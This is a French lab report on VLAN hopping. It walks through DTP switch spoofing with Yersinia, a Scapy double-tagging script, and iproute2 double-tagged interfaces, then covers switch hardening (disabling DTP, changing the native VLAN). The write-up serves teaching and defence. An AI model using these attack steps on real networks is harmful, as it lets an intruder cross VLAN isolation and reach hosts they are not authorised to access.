03_vlan_hopping.md

\newpage 

# Attaques et protection contre le VLAN Hopping

## Switch spoofing DTP

### DTP : Fonctionnement de base

1.  Entrez la commande ci-dessous sur S1 et S2

    ```
    show interface G0/0 switchport
    ```
2.
    - Quel champ indique le mode de fonctionnement (trunk ou access) du port G0/0 ?
        -   C'est le champ `Operational Mode`
    - A quelle valeur est-elle sur les switchs S1 et S2 ? 
        -   ```
            Operational Mode: static access    
            ```
    - Est-ce que le switch S2 a des interfaces en mode trunk ? Utilisez la commande `sh interface trunk` pour le vérifier.
        - Non, le switch S2 n'a aucune interface en mode trunk.

3.  Capturez les messages DTP qui circulent entre S1 et S2.
    
    ![Paquets DTP échangés entre S1 $\Leftrightarrow$ S2](../figs/dtp_comm_s1_s2.png) 

    - Quelle est la destination des messages ?
        - CDP/VTP/DTP/PAgP/UDLD --- 0**1**:00:0c:cc:cc:cc
    - De quel type de communication s’agit-t-il ? (Unicast/Multicast/Broadcast ?)
        - Multicast, car le bit de poids faible de l'octet de poids fort de 
        l'adresse est posé à 1 (démarqué en gras ci-dessus).

4. Sur la même adresse de destination circulent d’autres protocoles que DTP, citez-les et donnez-en une brêve description ?
     
    - Le seul protocole autre protocole que DTP dont le paquets portent la même
    adresse de destination est CDP. CDP (_Cisco Discovery Protocol_) est un protocole
    permettant la collecte d'informations sur les appareils voisins qui ont une
    connexion directe avec le switch en question. Ce protocole permet d'obtenir
    des informations non-seulement sur le hardware, mais aussi sur le software
    ainsi que le nom que porte l'appareil en question.
    
    - A partir de la capture Wireshark, décrivez comment sont encapsulés ces messages sur Ethernet[^1] ?
        - Les paquets CDP sont encapsulés dans le champ "données utiles" de la
        partie LLC (_Logical Link Control_) d'une trame Ethernet. Cette sous-couche
        fait partie de la couche 2 du modèle OSI (couche liaison) et elle permet
        de fiabiliser le protocole MAC par un contrôle d'erreur est un controle
        de flux.

5. Configurer l’interface G0/0 de S1 en trunk, puis affichez à nouveau les
trunk sur S2. Qu’est-ce qui a changé ? Expliquez pourquoi ?
    - Configuration de l'interface GigabitEthernet 0/0 en mode `trunk` :
    
    ```
    S1#conf t
    S1(config)#interface GigabitEthernet 0/0
    S1(config-if)#switchport trunk encapsulation dot1q 
    S1(config-if)#switchport mode trunk 
    S1(config-if)#no shut
    S1(config-if)#end
    ```

    En configurant l'interface GigabitEthernet 0/0 de S1 en mode `trunk`, S2 a
    détecté de son côté que son interface GigabitEthernet 0/0 est à présent
    reliée à un trunk.

    ```
    S2#sh interface trunk 
    
    Port        Mode             Encapsulation  Status        Native vlan
    Gi0/0       auto             n-802.1q       trunking      1
    
    Port        Vlans allowed on trunk
    Gi0/0       1-4094
    
    Port        Vlans allowed and active in management domain
    Gi0/0       1
    
    Port        Vlans in spanning tree forwarding state and not pruned
    Gi0/0       1
    S2# 
    ```

6. Re-affichez l’état switchport de l’interface G0/0 avec `sho interface G0/0
switchport` sur S2. Qu’est-ce qui a changé ?
    - La valeur du champ "Operational Mode" a changé :
    ```
    Operational Mode: trunk
    ```

7. Repassez l’interface G0/0 sur S1 en mode access. Est-ce que l’interface
G0/0 passe en access aussi ? Montrez-le avec une capture.

    - Oui, l'interface GigabitEthernet 0/0 de S2 repasse aussi en mode access
    comme le montre l'image ci-dessous :

    ![Les interfaces `Gi0/0` de S1 et S2 sont en mode `static access`](../figs/partA_part1_s1_s2_access.png) 


8. Donnez une explication de la valeur `dynamic auto` du champs `Administrative
Mode` de la commande `show interface G0/0 switchport` :
    - `dynamic auto` signifie que si une interface reçoit un paquet DTP voulant
    établir un trunk entre elle et le transmetteur, l'interface qui a reçu le
    paquet basculera en mode trunk.

    

[^1]: [Contrôle de la liaison logique](https://fr.wikipedia.org/wiki/Contr%C3%B4le_de_la_liaison_logique) 

### Attaque du DTP avec `Yersinia`

1. Configurez le VLAN 10 sur S1 et S2, avec G0/1 en mode access et G0/0 en mode trunk.
    - Configuration de l'interface `GigabitEthernet 0/0` en mode `trunk` (S1 et S2) :
    
    ```
    Switch>en
    Switch#conf t
    Switch(config)#vlan 10
    Switch(config-vlan)#exit
    Switch(config)#interface GigabitEthernet 0/0
    Switch(config-if)#switchport trunk encapsulation dot1q
    Switch(config-if)#switchport mode trunk
    Switch(config-if)#no shut
    Switch(config-if)#end
    ```

    \newpage

    - Configuration de l'interface `GigabitEthernet 0/1` en mode `access` (S1 et S2) :

    ```
    Switch>en
    Switch#conf t
    Switch(config)#interface GigabitEthernet 0/1
    Switch(config-if)#switchport access vlan 10
    Switch(config-if)#no shut
    Switch(config-if)#end
    ```

2. Configurez l’adresse IP de H1 et H2 à 10.0.0.1/24 et 10.0.0.2/24 respectivement.
    - H1 :

    ```bash
    hostnamectl set-hostname H1
    ip addr add 10.0.0.1/24 dev eth0
    ip link set up dev eth0
    ```

    - H2 :

    ```bash
    hostnamectl set-hostname H2
    ip addr add 10.0.0.2/24 dev eth0
    ip link set up dev eth0
    ```

3. 
    - Configurez l’adresse IP de `kali-linux-1` à 10.0.0.3/24. 

    ```bash
    sudo ip addr add 10.0.0.3/24 dev eth0
    sudo ip link set up dev eth0
    ```

    - Arrivez-vous à pinger H1 et H2 depuis cette machine ? Pourquoi ?
        - On n'arrive pas à pinger H1 et H2 depuis `kali-linux-1` car cette
        machine se trouve en dehors du VLAN 10 suite au fait qu'elle est reliée
        au switch S1 par l'interface `GigabitEthernet 0/2`.

    - Enlevez cette IP de `kali-linux-1` :

    ```bash
    sudo ip addr del 10.0.0.3/24 dev eth0
    sudo ip link set down dev eth0
    ```

4. Quel est la valeur de `Operational Mode` du port G0/2 sur le switch S1 ?
    - Afin d'obtenir cette information il faut exécuter la commande suivante :

    ```
    show interface GigabitEthernet 0/2 switchport
    ```
    
    Sa valeur est : `static access`.

5. Effectuez maintenant une attaque à distance depuis la machine Kali en
exécutant la commande `sudo yersinia -I`. Selectionnez, avec la touche `g`, les
attaques de type `Dynamic trunking Protocol`. Appuyer sur `x`, puis `1` pour
`Enable trunking`.

6. Quel est à présent la valeur de Operational Mode du port G0/2 sur le switch
S1 ? Pourquoi ?
    - À présent la valeur du champ `Operational Mode` est `trunk`. Grâce à 
    l'outil `yersinia`, on a pu forger un paquet DTP qui nous a permis de nous 
    faire passer pour switch qui désire établir un trunk avec S1. En envoyant
    ce paquet sur l'interface GigabitEthernet 0/2 de S1, on a pu la faire basculer
    en mode `trunk`.

7. Il est a présent très simple pour la machine Kali de rejoindre le vlan 10.
Rajoutez-y simplement une interface qui tagge tout les paquets avec le numéro
de vlan 10 par la commande suivante :

    ```bash
    ip link add link eth0 name eth0.10 type vlan id 10
    ```

8. 
    - Configurez eth0.10 avec l’IP 10.0.0.3/24.

    ```bash
    sudo ip addr add 10.0.0.3/24 dev eth0.10
    sudo ip link set up dev eth0.10
    ```

    - Arrivez-vous à pinger 10.0.0.1 et 10.0.0.2 ? Expliquez pourquoi ?
        - Oui, à présent nous arrivons à pinger H1 et H2 car nous nous retrouvons
        à présent sur le VLAN 10 qui relie H1 à H2.



### Sécurisation des switches

1. Sécurisez l’ensemble des ports des switches S1 et S2 de façon à ce qu’aucune
attaque ne puisse avoir lieu sur les ports restant des switchs qui
n’appartiennent pas au VLAN 10.

    - `GigabitEthernet 0/2` de S1 :

    ```
    Switch>en
    Switch#conf t
    Switch(config)#interface GigabitEthernet 0/2
    Switch(config-if)#switchport mode access
    Switch(config-if)#no shut
    Switch(config-if)#end
    ```

    - `GigabitEthernet 0/0` de S1 et S2:


    ```
    Switch>en
    Switch#conf t
    Switch(config)#interface GigabitEthernet 0/0
    Switch(config-if)#switchport trunk encapsulation dot1q
    Switch(config-if)#switchport mode trunk
    Switch(config-if)#switchport nonegotiate
    Switch(config-if)#no shut
    Switch(config-if)#end
    ```



## VLAN Hopping sur le VLAN natif

### Révision VLAN

1. Pourquoi existe-t-il un VLAN natif ? Autrement dit, quelle est son utilité ?
    - L'utilité d'un VLAN natif est de permettre la compatibilité avec des appareils
    réseaux plus anciens qui ne permettent pas la segmentation en VLAN.
2. Configurez S1 et S2, ainsi que l’adresse IP de H1,H2, H3 et H4 pour que les
VLAN 100 et 200 indiqués sur la topologie soient actifs. Vous conservez le VLAN
natif à sa valeur initiale.
    - S1 :

    ```cisco 
    ================ VLAN ================
    Switch>en
    Switch#conf t
    Switch(config)#hostname S1
    S1(config)#vlan 100
    S1(config-vlan)#exit
    S1(config)#vlan 200
    S1(config-vlan)#exit
    =============== Gi0/0 ================
    S1(config)#interface GigabitEthernet 0/0
    S1(config-if)#switchport trunk encapsulation dot1q
    S1(config-if)#switchport mode trunk
    S1(config-if)#no shut
    S1(config-if)#exit
    =============== Gi0/1 ================
    S1(config)#interface GigabitEthernet 0/1
    S1(config-if)#switchport access vlan 100
    S1(config-if)#no shut
    S1(config-if)#exit
    =============== Gi0/2 ================
    S1(config)#interface GigabitEthernet 0/2
    S1(config-if)#switchport access vlan 200
    S1(config-if)#no shut
    S1(config-if)#exit
    ```

    - S2 :

    ```cisco 
    ================ VLAN ================
    Switch>en
    Switch#conf t
    Switch(config)#hostname S2
    S2(config)#vlan 100
    S2(config-vlan)#exit
    S2(config)#vlan 200
    S2(config-vlan)#exit
    =============== Gi0/0 ================
    S2(config)#interface GigabitEthernet 0/0
    S2(config-if)#switchport trunk encapsulation dot1q
    S2(config-if)#switchport mode trunk
    S2(config-if)#no shut
    S2(config-if)#exit
    =============== Gi0/1 ================
    S2(config)#interface GigabitEthernet 0/1
    S2(config-if)#switchport access vlan 100
    S2(config-if)#no shut
    S2(config-if)#exit
    =============== Gi0/2 ================
    S2(config)#interface GigabitEthernet 0/2
    S2(config-if)#switchport access vlan 200
    S2(config-if)#no shut
    S2(config-if)#exit
    ```

    - H1 :

    ```bash
    ip addr add 10.0.0.1/24 dev eth0
    ip link set up dev eth0
    ```

    - H2 :

    ```bash
    ip addr add 10.0.0.2/24 dev eth0
    ip link set up dev eth0
    ```

    - H3 :

    ```bash
    ip addr add 10.1.0.3/24 dev eth0
    ip link set up dev eth0
    ```

    - H4 :

    ```bash
    ip addr add 10.1.0.4/24 dev eth0
    ip link set up dev eth0
    ```

3. Montrez, par des captures d’écrans, que les VLAN 100 et 200 sont
effectivement isolés en assignant temporairement une IP du subnet du VLAN 100 à
la machine `kali-linux-1` et en essayant de pinger sans succès H1 et H2.

    - `kali-linux-1` :

    ```bash
    sudo ip addr add 10.0.0.3/24 dev eth0
    ```

![H1 n'est pas atteignable depuis `kali-linux-1`](../figs/h1_from_kali_unreachable.png){width=80%}  

![H2 n'est pas atteignable depuis `kali-linux-1`](../figs/h2_from_kali_unreachable.png){width=80%}

\newpage

- Démontrez, aussi avec une capture d’écran, le cas inverse en déplaçant
temporairement `kali-linux-1` dans le vlan 100 est en relançant le ping, cette
fois-ci avec succès.

    - S1 :
    ```
    =============== Gi0/3 ================
    S1(config)#interface GigabitEthernet 0/3
    S1(config-if)#switchport access vlan 100
    S1(config-if)#no shut
    S1(config-if)#exit
    ```

![H1 est atteignable depuis `kali-linux-1`](../figs/h1_from_kali_reachable.png)


### Double tagging `Scapy`

Ci-dessous se trouve le script grâce auquel nous pourrons effectuer une attaque
par _double-tagging_.

```python
from scapy.all import *

sendp(Ether(dst='ff:ff:ff:ff:ff:ff', src='00:01:02:03:04:05')/ \
Dot1Q(vlan=1)/Dot1Q(vlan=100)/ \
IP(dst='10.0.0.1', src='10.0.0.3')/ICMP(),iface="eth0")
```

Premièrement il faut enlever l'interface `GigabitEthernet 0/3` de S1 du VLAN 100 :

```
=============== Gi0/3 ================
S1(config)#interface GigabitEthernet 0/3
S1(config-if)#no switchport access vlan 100
S1(config-if)#no shut
S1(config-if)#exit
```

Puis il est nécessaire de retirer l'adresse IP attribué à `kali-linux-1` sur
l'interface `eth0` :

```bash
sudo ip addr del 10.0.0.3/24 dev eth0
```

1. A partir du script fourni ci-dessus, exécutez une attaque par double-tagging.

    ```bash
    sudo python3 <nom_attribué_au_script>.py
    ```

2. Effectuer une capture Wireshark sur le lien entre S1 et S2, sur le lien
entre H2 et S2 et sur le lien entre H2 et S1. Où voyez-vous le trafic circuler ?
    - Sur les captures ci-dessous (demarquée en vert), on voit bien que le
    paquet circule effectivement sur le lien S1 $\Leftrightarrow$ S2 (capture
    de gauche), ainsi que sur le lien S2 $\Leftrightarrow$ H2 (capture de
    droite).

    ![Capture Wireshark de l'attaque `scapy`](../figs/scapy_wireshark.png) 

3. Quelle est la valeur du tag 802.1Q restant sur la trame venant de
`kali-linux-1` après être traitée par S1 ? Expliquez pourquoi ?
    - La valeur du tag 802.1Q est égale à 0x64 = 100. Dans le format du tag
    802.1Q, les 12 derniers bits correspondent au VID (_VLAN Identifier_). Par
    conséquent la valeur de ce champ correspond au VLAN auquel appartient la
    trame. Dans notre cas, la trame circule effectivement sur le VLAN 100, d'où
    la valeur du VID.

4. Est-ce le switch a moyen de vérifier que le tag 802.1Q présent sur la trame
provenant de `kali-linux-1` est légitime ? Pourquoi ?
    - Le switch n'a pas moyen de vérifier que la trame est légitime car dans
    l'entête du tag 802.1Q, il n'y a aucun champ qui permet de vérifier
    "l'authenticité" de la source.

5. Pourquoi la trame arrive à passer sur le lien vers H2 mais pas sur le lien
vers H1 ?
    - La raison pour laquelle la trame n'est pas visible sur le lien H1
    $\Leftrightarrow$ S1 est que, quand le paquet arrive initialement sur S1,
    il va retirer le premier tag dont le VID est égal à 1, par conséquent ce
    n'est que le second switch qui verra le valeur du VID du deuxième tag
    correspondant au VLAN attaqué. Vu que H1 est relié à S1, c'est pour cette
    raison qu'on ne voit pas la trame sur ce lien.

6. Est-ce qu’un Firewall qui filtrerait les paquets en couche 3 aiderait à
mitiger cette attaque ? Pourquoi ?
    - Non, un firewall ne permettrait pas de mitiger cette attaque car une trame
    Ethernet est du niveau 2, par conséquent il ne pourrait pas filtrer ce
    paquet.

### Double tagging `iproute2`

Ci-dessous, se trouvent les commandes utilisées afin de configurer les 2
interfaces virtuelles nécéssaires à l'implémentation de l'attaque par "double-
tagging" :

```bash
sudo ip link add link eth0 name eth0.1 type vlan id 1
sudo ip link add link eth0.1 name eth0.1.100 type vlan id 100
sudo ip addr add 10.0.0.3/24 dev eth0.1.100
```

Par la suite, nous avons effectué un ping depuis `kali-linux-1` jusqu'à H2 
(10.0.0.2) se situant sur le VLAN 100 avec la commande suivante qui permet
de spécifier l'interface à partir de laquelle envoyer le message ICMP :

```bash
ping -I eth0.1.100 10.0.0.2
```

Sur l'image ci-dessous, nous pouvons effectivement remarquer que notre paquet
a réussi à atteindre H2 depuis `kali-linux-1` car notre paquet ICMP contenait
2 tags (1 pour le VLAN 1 qui est retiré lors de l'arrivée sur le switch S1, puis
le tag restant permet d'atteindre un hôte se situant sur le VLAN du second tag,
en l'occurrence H2 se situant sur le VLAN 100).

![Paquet à destination de H2 depuis `kali-linux-1`](../figs/arp_packet_h2-kali.png) 

### Sécurisation des switches


1. Renommer les VLANs (ne pas avoir de nom du style VLAN0100) :
    - VLAN 100 $\Rightarrow$ H1-H2 :
    ```
    S1#vlan database
    % Warning: It is recommended to configure VLAN from config mode,
      as VLAN database mode is being deprecated. Please consult user
      documentation for configuring VTP/VLAN in config mode.
    
    S1(vlan)#vlan 100 name H1-H2
    VLAN 100 modified:
        Name: H1-H2
    S1(vlan)#exit
    APPLY completed.
    Exiting....
    ```
    - VLAN 200 $\Rightarrow$ H3-H4 :

    ```
    S1#vlan database
    % Warning: It is recommended to configure VLAN from config mode,
      as VLAN database mode is being deprecated. Please consult user
      documentation for configuring VTP/VLAN in config mode.
    
    S1(vlan)#vlan 200 name H3-H4
    VLAN 200 modified:
        Name: H3-H4
    S1(vlan)#exit
    APPLY completed.
    Exiting....
    ```

2. Désactivation de l'interface GigabitEthernet0/3 sur S1 :
    - Commande :
    ```
    S1#conf t
    Enter configuration commands, one per line.  End with CNTL/Z.
    S1(config)#interface GigabitEthernet 0/3
    S1(config-if)#shutdown
    ```

    - Vérification avec `sh interface GigabitEthernet0/3 switchport` :

    ```
    Operational Mode: down
    ```

3. Désactivation de DTP à l'aide de la commande `switchport nonegotiate` (du
côté de S1 ainsi que S2) :

    - Commandes à effectuer afin de passer l'interface `GigabitEthernet0/0` en
    `nonegotiate` :
    ```
    S1#conf t
    S1(config)#interface GigabitEthernet 0/0
    S1(config-if)#switchport trunk encapsulation dot1q
    S1(config-if)#switchport mode trunk
    S1(config-if)#switchport nonegotiate
    S1(config-if)#no shut
    ```

    - Vérification avec `sh interface GigabitEthernet0/0 switchport` :

    ```
    Negotiation of Trunking: Off
    ```

4. Changement de la valeur du VLAN natif (1 $\Rightarrow$ 999) sur S1 et S2 :
    
    - Commandes à effectuer sur S1 et S2 :
    ```
    S1#conf t
    S1(config)#interface GigabitEthernet 0/0
    S1(config-if)#switchport trunk native vlan 999
    S1(config-if)#no shut
    ```

    - Vérification avec `sh interface trunk` (ex: sur S2) :

    ```
    S2#sh interface trunk 
    
    Port        Mode             Encapsulation  Status        Native vlan
    Gi0/0       on               802.1q         trunking      999
    
    Port        Vlans allowed on trunk
    Gi0/0       1-4094
    
    Port        Vlans allowed and active in management domain
    Gi0/0       1,100,200
    
    Port        Vlans in spanning tree forwarding state and not pruned
    Gi0/0       1,100,200
    S2#
    ```

5. Vérification des mesures de sécurité mise en place :
    - Sur l'image ci-dessous on peut observer une tentative d'attaque grâce à
    `scapy` après avoir mis en place les mesures de sécurité citées ci-dessus.
    Nous pouvons effectivement remarquer que le paquet ICMP ne traverse plus le
    switch S2 comme il le fesait auparavant.

    ![Résultat de la sécurisation des switches](../figs/secu_done_labo3.png)